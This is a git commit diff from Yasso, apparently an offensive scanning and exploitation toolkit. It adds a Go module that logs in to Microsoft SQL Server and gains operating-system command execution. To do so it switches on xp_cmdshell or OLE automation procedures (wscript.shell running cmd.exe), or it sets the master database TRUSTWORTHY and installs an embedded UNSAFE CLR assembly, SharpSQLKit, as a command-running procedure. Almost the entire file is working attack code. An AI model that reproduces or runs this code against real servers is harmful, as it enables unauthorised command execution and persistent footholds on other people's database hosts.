Yasso更新大改动，更新扫描方式，去除不常用功能，增加指纹和协议识别，修补bug等

2026-06-16 15:18:12 +08:00 · 2022-05-29 09:11:07 +08:00
parent a6cd80f8e8
commit cb72f18edd
129 changed files with 16619 additions and 6278 deletions
--- a/pkg/exploit/mssql/mssql.go
+++ b/pkg/exploit/mssql/mssql.go
@@ -0,0 +1,213 @@
+package mssql
+
+import (
+	config2 "Yasso/config"
+	"Yasso/core/logger"
+	"Yasso/core/plugin"
+	"Yasso/pkg/exploit/config"
+	"database/sql"
+	_ "embed"
+	"fmt"
+	"strconv"
+	"time"
+)
+
+//go:embed static/SharpSQLKit.txt
+var SharpSQLKit string
+
+func ExploitMssql(exploits config.Exploits, method int, Command string) {
+	var (
+		conn = new(setting)
+	)
+	mssqlConn, status, err := plugin.MssqlConn(config2.ServiceConn{
+		Hostname: exploits.Hostname,
+		Port:     exploits.Port,
+		Timeout:  1000 * time.Millisecond,
+	}, exploits.User, exploits.Pass)
+	if status == false || err != nil {
+		logger.Fatal("conn mssql failed")
+		return
+	}
+
+	switch method {
+	case 1:
+		conn.Setting(mssqlConn)
+		conn.xp_shell(Command)
+	case 2:
+		conn.Setting(mssqlConn)
+		conn.sp_shell(Command)
+	case 3:
+		conn.Setting(mssqlConn)
+		conn.Install_clr()
+	case 4:
+		conn.Setting(mssqlConn)
+		conn.Uninstall_clr()
+	default:
+		logger.Fatal("not found mssql exploit method")
+		return
+	}
+}
+
+func (s *setting) Setting(conn *sql.DB) {
+	s.Conn = conn
+}
+
+type setting struct {
+	Conn    *sql.DB
+	Command string
+}
+
+func (s *setting) xp_shell(Command string) bool {
+
+	if s.set_configuration("xp_cmdshell", 0) && !s.enable_xp_cmdshell() {
+		return false
+	}
+	logger.Success(fmt.Sprintf("Command: %v", Command))
+	var sqlstr = fmt.Sprintf("exec master..xp_cmdshell '%v'", Command)
+	r, err := config.SQLExecute(s.Conn, sqlstr)
+	if err != nil {
+		logger.Fatal(fmt.Sprintf("exec xp_cmdshell command failed %v", err))
+		return false
+	}
+	for _, b := range r.Rows {
+		fmt.Println(b[0])
+	}
+	return true
+}
+
+func (s *setting) sp_shell(Command string) bool {
+	if s.check_configuration("Ole Automation Procedures", 0) && !s.Enable_ole() {
+		return false
+	}
+	var sqlstr = fmt.Sprintf(`declare @shell int,@exec int,@text int,@str varchar(8000)
+exec sp_oacreate 'wscript.shell',@shell output 
+exec sp_oamethod @shell,'exec',@exec output,'c:\windows\system32\cmd.exe /c %v'
+exec sp_oamethod @exec, 'StdOut', @text out;
+exec sp_oamethod @text, 'ReadAll', @str out
+select @str`, Command)
+	logger.Success(fmt.Sprintf("Command: %v", Command))
+	r, err := config.SQLExecute(s.Conn, sqlstr)
+	if err != nil {
+		logger.Fatal(fmt.Sprintf("exec ole command failed %v", err))
+		return false
+	}
+	for i, b := range r.Rows {
+		fmt.Println(b[i])
+	}
+	return true
+}
+
+func (s *setting) Enable_ole() bool {
+	if !s.set_configuration("show advanced options", 1) {
+		logger.Fatal("cannot enable 'show advanced options'")
+		return false
+	}
+	if !s.set_configuration("Ole Automation Procedures", 1) {
+		logger.Fatal("cannot enable 'Ole Automation Procedures'")
+		return false
+	}
+	return true
+}
+
+func (s *setting) check_configuration(option string, value int) bool {
+	var Command = fmt.Sprintf(`SELECT cast(value as INT) as b FROM sys.configurations where name = '%s';`, option)
+	r, err := config.SQLExecute(s.Conn, Command)
+	if err != nil {
+		return false
+	}
+	if len(r.Rows) == 1 && r.Rows[0][0] == strconv.Itoa(value) {
+		return true
+	}
+	return false
+}
+
+func (s *setting) set_configuration(option string, value int) bool {
+	// 设置
+	var Command = fmt.Sprintf("exec master.dbo.sp_configure '%v','%v';RECONFIGURE;", option, value)
+	_, err := config.SQLExecute(s.Conn, Command)
+	if err != nil {
+		return false
+	}
+	return s.check_configuration(option, value)
+}
+
+func (s *setting) set_permission_set() bool {
+	var Command = fmt.Sprintf("ALTER DATABASE master SET TRUSTWORTHY ON;")
+	logger.Fatal("ALTER DATABASE master SET TRUSTWORTHY ON")
+	_, err := config.SQLExecute(s.Conn, Command)
+	if err != nil {
+		logger.Fatal("ALTER DATABASE master SET TRUSTWORTHY ON Failed")
+		return false
+	}
+	return true
+}
+
+func (s *setting) enable_xp_cmdshell() bool {
+	if !s.set_configuration("show advanced options", 1) {
+		logger.Fatal("cannot ebable 'show advanced options'")
+		return false
+	}
+	if !s.set_configuration("xp_cmdshell", 1) {
+		logger.Fatal("cannot enable 'xp_cmdshell'")
+		return false
+	}
+	return true
+}
+
+func (s *setting) Install_clr() bool {
+	if !s.set_permission_set() {
+		return false
+	}
+	if !s.CREATE_ASSEMBLY() {
+		return false
+	}
+	if !s.CREATE_PROCEDURE() {
+		return false
+	}
+	logger.Info("Install SharpSQLKit successful!")
+	logger.Info("Please Use SQL Connect Tools to Execute")
+	return true
+}
+
+func (s *setting) CREATE_ASSEMBLY() bool {
+	var KitHex string
+	logger.Info("SQLKit ==> SharpSQLKit")
+	KitHex = SharpSQLKit
+	var Command = fmt.Sprintf(`CREATE ASSEMBLY [CLR_module]
+    AUTHORIZATION [dbo]
+    FROM 0x%s
+    WITH PERMISSION_SET = UNSAFE;`, KitHex)
+	_, err := config.SQLExecute(s.Conn, Command)
+	if err != nil {
+		logger.Fatal(fmt.Sprintf("Import the assembly failed %v", err))
+		return false
+	}
+	logger.Info("Import the assembly")
+	return true
+}
+
+func (s *setting) CREATE_PROCEDURE() bool {
+	var Command string
+	Command = fmt.Sprintf(`CREATE PROCEDURE [dbo].[ClrExec] @cmd NVARCHAR (MAX) AS EXTERNAL NAME [CLR_module].[StoredProcedures].[ClrExec]`)
+	_, err := config.SQLExecute(s.Conn, Command)
+	if err != nil {
+		logger.Fatal(fmt.Sprintf("Link the assembly to a stored procedure failed %v", err))
+		return false
+	}
+	logger.Info("Link the assembly to a stored procedure")
+	return true
+}
+
+func (s *setting) Uninstall_clr() bool {
+	var Command string
+	logger.Info("SQLKit ==> SharpSQLKit")
+	Command = fmt.Sprintf(`drop PROCEDURE dbo.ClrExec
+drop assembly CLR_module`)
+	_, err := config.SQLExecute(s.Conn, Command)
+	if err != nil {
+		logger.Fatal(fmt.Sprintf("Uninstall SQLKit failed %v", err))
+		return false
+	}
+	logger.Info("uninstall SQLKit successful!")
+	return true
+}
--- a/pkg/exploit/mssql/static/SharpSQLKit.txt
+++ b/pkg/exploit/mssql/static/SharpSQLKit.txt